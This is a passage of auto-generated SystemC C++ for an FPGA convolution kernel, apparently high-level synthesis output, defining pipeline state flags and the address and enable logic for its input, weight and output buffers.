!esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_block_state94_pp0_stage12_iter5() { ap_block_state94_pp0_stage12_iter5 = !esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_block_state95_pp0_stage13_iter5() { ap_block_state95_pp0_stage13_iter5 = !esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_block_state96_pp0_stage14_iter5() { ap_block_state96_pp0_stage14_iter5 = !esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_block_state97_pp0_stage15_iter5() { ap_block_state97_pp0_stage15_iter5 = !esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_block_state98_pp0_stage0_iter6() { ap_block_state98_pp0_stage0_iter6 = !esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_block_state99_pp0_stage1_iter6() { ap_block_state99_pp0_stage1_iter6 = !esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_block_state9_pp0_stage7_iter0() { ap_block_state9_pp0_stage7_iter0 = !esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1); } void convolve_kernel::thread_ap_condition_pp0_exit_iter0_state2() { if (esl_seteq<1,1,1>(exitcond_flatten3_fu_621_p2.read(), ap_const_lv1_1)) { ap_condition_pp0_exit_iter0_state2 = ap_const_logic_1; } else { ap_condition_pp0_exit_iter0_state2 = ap_const_logic_0; } } void convolve_kernel::thread_ap_done() { if (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state249.read())) { ap_done = ap_const_logic_1; } else { ap_done = ap_const_logic_0; } } void convolve_kernel::thread_ap_enable_pp0() { ap_enable_pp0 = (ap_idle_pp0.read() ^ ap_const_logic_1); } void convolve_kernel::thread_ap_idle() { if ((esl_seteq<1,1,1>(ap_const_logic_0, ap_start.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()))) { ap_idle = ap_const_logic_1; } else { ap_idle = ap_const_logic_0; } } void convolve_kernel::thread_ap_idle_pp0() { if ((esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter2.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter3.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter4.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter5.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter6.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter7.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter8.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter9.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter10.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter11.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter12.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter13.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter14.read()) && esl_seteq<1,1,1>(ap_const_logic_0, ap_enable_reg_pp0_iter15.read()))) { ap_idle_pp0 = ap_const_logic_1; } else { ap_idle_pp0 = ap_const_logic_0; } } void convolve_kernel::thread_ap_ready() { if (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state249.read())) { ap_ready = ap_const_logic_1; } else { ap_ready = ap_const_logic_0; } } void convolve_kernel::thread_ap_rst_n_inv() { ap_rst_n_inv = (sc_logic) (~ap_rst_n.read()); } void convolve_kernel::thread_bufi_Addr_A() { bufi_Addr_A = (!ap_const_lv32_2.is_01())? sc_lv<32>(): bufi_Addr_A_orig.read() << (unsigned short)ap_const_lv32_2.to_uint(); } void convolve_kernel::thread_bufi_Addr_A_orig() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_50_cast_fu_2207_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_49_cast_fu_2199_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_48_cast_fu_2183_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_47_cast_fu_2171_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_46_cast_fu_2149_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_45_cast_fu_2132_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_44_cast_fu_2087_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_43_cast_fu_1982_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_42_cast_fu_1893_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_41_cast_fu_1852_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_40_cast_fu_1783_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_39_cast_fu_1738_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_38_cast_fu_1693_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_37_cast_fu_1449_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_36_cast_fu_1379_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00000000.read(), ap_const_boolean_0))) { bufi_Addr_A_orig = (sc_lv<32>) (tmp_35_cast_fu_1321_p1.read()); } else { bufi_Addr_A_orig = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; } } void convolve_kernel::thread_bufi_Clk_A() { bufi_Clk_A = ap_clk.read()? SC_LOGIC_1 : SC_LOGIC_0; } void convolve_kernel::thread_bufi_Din_A() { bufi_Din_A = ap_const_lv32_0; } void convolve_kernel::thread_bufi_EN_A() { if (((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0)))) { bufi_EN_A = ap_const_logic_1; } else { bufi_EN_A = ap_const_logic_0; } } void convolve_kernel::thread_bufi_Rst_A() { bufi_Rst_A = ap_rst_n_inv.read(); } void convolve_kernel::thread_bufi_WEN_A() { bufi_WEN_A = ap_const_lv4_0; } void convolve_kernel::thread_bufo_Addr_A() { bufo_Addr_A = (!ap_const_lv32_2.is_01())? sc_lv<32>(): bufo_Addr_A_orig.read() << (unsigned short)ap_const_lv32_2.to_uint(); } void convolve_kernel::thread_bufo_Addr_A_orig() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00000000.read(), ap_const_boolean_0))) { bufo_Addr_A_orig = (sc_lv<32>) (ap_reg_pp0_iter14_bufo_addr_reg_2650.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00000000.read(), ap_const_boolean_0))) { bufo_Addr_A_orig = (sc_lv<32>) (bufo_addr_reg_2650.read()); } else { bufo_Addr_A_orig = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; } } void convolve_kernel::thread_bufo_Clk_A() { bufo_Clk_A = ap_clk.read()? SC_LOGIC_1 : SC_LOGIC_0; } void convolve_kernel::thread_bufo_Din_A() { bufo_Din_A = reg_575.read(); } void convolve_kernel::thread_bufo_EN_A() { if (((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter15.read())))) { bufo_EN_A = ap_const_logic_1; } else { bufo_EN_A = ap_const_logic_0; } } void convolve_kernel::thread_bufo_Rst_A() { bufo_Rst_A = ap_rst_n_inv.read(); } void convolve_kernel::thread_bufo_WEN_A() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter15.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter15_exitcond_flatten3_reg_2229.read()))) { bufo_WEN_A = ap_const_lv4_F; } else { bufo_WEN_A = ap_const_lv4_0; } } void convolve_kernel::thread_bufw_Addr_A() { bufw_Addr_A = (!ap_const_lv32_2.is_01())? sc_lv<32>(): bufw_Addr_A_orig.read() << (unsigned short)ap_const_lv32_2.to_uint(); } void convolve_kernel::thread_bufw_Addr_A_orig() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_170_cast_fu_2215_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_163_cast_fu_2211_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_156_cast_fu_2203_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_149_cast_fu_2195_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_142_cast_fu_2179_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_135_cast_fu_2157_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_128_cast_fu_2140_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_111_cast_fu_2095_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_104_cast_fu_1990_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_97_cast_fu_1901_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_90_cast_fu_1860_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_83_cast_fu_1791_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_76_cast_fu_1746_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_69_cast_fu_1701_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_121_cast_fu_1440_p1.read()); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00000000.read(), ap_const_boolean_0))) { bufw_Addr_A_orig = (sc_lv<32>) (tmp_62_cast_fu_1259_p1.read()); } else { bufw_Addr_A_orig = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; } } void convolve_kernel::thread_bufw_Clk_A() { bufw_Clk_A = ap_clk.read()? SC_LOGIC_1 : SC_LOGIC_0; } void convolve_kernel::thread_bufw_Din_A() { bufw_Din_A = ap_const_lv32_0; } void convolve_kernel::thread_bufw_EN_A() { if (((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00011001.read(), ap_const_boolean_0) && 